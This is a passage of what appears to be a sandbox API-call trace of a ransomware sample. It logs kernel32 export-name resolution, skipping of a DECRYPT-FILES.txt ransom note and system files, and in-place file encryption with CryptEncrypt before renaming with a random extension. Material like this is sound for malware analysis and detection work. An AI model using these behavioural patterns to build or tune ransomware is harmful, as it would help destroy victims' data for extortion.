(lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.355] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.355] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.355] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.355] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.355] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.355] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.355] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.355] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.355] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.355] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.355] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.355] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.355] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.355] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.356] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.356] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.356] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.356] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.356] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.356] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.356] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.356] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.356] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.356] lstrlenA (lpString="DELETEATOM") returned 10 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.356] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.356] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.356] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.356] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.356] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.356] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.356] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.356] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.356] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.357] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.357] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.357] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.357] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.357] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.357] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.357] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.357] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.357] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.357] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.357] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.357] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.357] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.357] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.357] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.357] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.357] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.357] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.357] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.358] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.358] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.358] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.358] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.358] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.358] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.358] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.358] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.358] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.358] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.358] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.358] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.358] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.358] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.358] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.358] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.359] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav") returned 74 [0085.359] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav.yLJZ291") returned 82 [0085.359] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\a81stbcnkpkh.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav.yLJZ291" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\a81stbcnkpkh.wav.yljz291"), dwFlags=0x0) returned 1 [0085.359] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.360] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.360] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.361] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0d0a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf0d0a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0d0a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.361] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.361] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0d0a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf0d0a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0d0a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.361] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.361] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.361] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.361] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.361] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.361] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.361] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.361] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.361] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0085.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\jkbimi8.tmp" [0085.361] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.361] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.362] CloseHandle (hObject=0x0) returned 0 [0085.362] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.362] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb2411e0, ftCreationTime.dwHighDateTime=0x1d4d40d, ftLastAccessTime.dwLowDateTime=0x22756a70, ftLastAccessTime.dwHighDateTime=0x1d4cc4f, ftLastWriteTime.dwLowDateTime=0x22756a70, ftLastWriteTime.dwHighDateTime=0x1d4cc4f, nFileSizeHigh=0x0, nFileSizeLow=0xf98a, dwReserved0=0x0, dwReserved1=0x0, cFileName="N 30hPEFiO2.m4a", cAlternateFileName="N30HPE~1.M4A")) returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="autorun.inf") returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="boot.ini") returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="desktop.ini") returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="ntuser.dat") returned -1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="iconcache.db") returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="bootsect.bak") returned 1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="ntuser.dat.log") returned -1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="thumbs.db") returned -1 [0085.362] lstrcmpiW (lpString1="N 30hPEFiO2.m4a", lpString2="Bootfont.bin") returned 1 [0085.362] lstrlenW (lpString="N 30hPEFiO2.m4a") returned 15 [0085.362] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.362] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.362] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.362] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.362] lstrlenW (lpString="N 30hPEFiO2.m4a") returned 15 [0085.362] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0085.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="N 30hPEFiO2.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a" [0085.362] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\n 30hpefio2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.363] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=63882) returned 1 [0085.363] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.363] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.363] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.363] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.363] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.364] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.364] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.365] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.365] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.366] CloseHandle (hObject=0x43c) returned 1 [0085.366] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.366] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.367] CloseHandle (hObject=0x0) returned 0 [0085.367] CloseHandle (hObject=0x438) returned 1 [0085.367] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.367] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.367] GetTickCount () returned 0x114dcc8 [0085.367] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.368] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.368] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.368] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.368] lstrlenA (lpString="kernel32.dll") returned 12 [0085.368] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.368] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.368] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.368] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.369] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.369] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.369] lstrlenA (lpString="ADDATOMA") returned 8 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.369] lstrlenA 